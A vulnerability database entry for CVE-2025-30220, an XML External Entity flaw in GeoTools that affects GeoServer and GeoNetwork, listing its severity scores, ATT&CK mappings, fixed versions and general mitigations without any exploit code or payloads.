CVE-2025-30220
Published: 10 June 2025
Summary
CVE-2025-30220 is a critical-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in Geotools Geotools. Its CVSS base score is 9.9 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Data from Local System (T1005); ranked in the top 5.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
GeoServer is an open source server for sharing and editing geospatial data, and the vulnerability resides in the GeoTools gt-xsd-core Schemas class that relies on the Eclipse XSD library to handle schema structures. When XML documents reference external schemas, the class fails to apply any configured EntityResolver from ParserHandler, allowing XML External Entity processing. The same flaw affects the gt-wfs-ng DataStore because its ENTITY_RESOLVER connection parameter is not honored. The issue impacts GeoServer, GeoTools, and GeoNetwork installations that expose XML parsing paths.
An unauthenticated remote attacker can supply a crafted XML document containing external entity references to trigger XXE or related SSRF behavior. Successful exploitation can yield high-impact outcomes including arbitrary file disclosure, internal network probing, or limited service disruption, consistent with the CVSS 9.9 rating that reflects network attack vector, no required credentials or user interaction, and changed scope.
Official fixes are available in GeoTools 33.1, 32.3, 31.7 and 28.6.1, GeoServer 2.27.1, 2.26.3 and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13. GeoServer documentation recommends explicit configuration to disable external entity resolution, while GeoNetwork has published corresponding pull requests and a security advisory detailing the parameter-handling corrections.
The EPSS score stands at 0.1394 with no material increase from its recorded peak, indicating limited observed exploitation interest to date.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-17683
Vulnerability details
GeoServer is an open source server that allows users to share and edit geospatial data. GeoTools Schema class use of Eclipse XSD library to represent schema data structure is vulnerable to XML External Entity (XXE) exploit. This impacts whoever exposes…
more
XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of gt-wfs-ng DataStore where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
XXE vulnerability (CWE-611) in GeoServer/GeoNetwork WFS services enables unauthenticated remote exploitation of public-facing application (T1190), local file disclosure (T1005), and SSRF for internal network service discovery (T1046).
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Penetration testing includes XML external entity payloads, detecting XXE vulnerabilities and enabling their mitigation.
Identifies XML external entity processing via monitoring of unusual file/network access or resource usage.
Outbound connections to external resources can be monitored and limited at the boundary, reducing SSRF impact.
Validates server-side URLs and resource references to block SSRF attempts.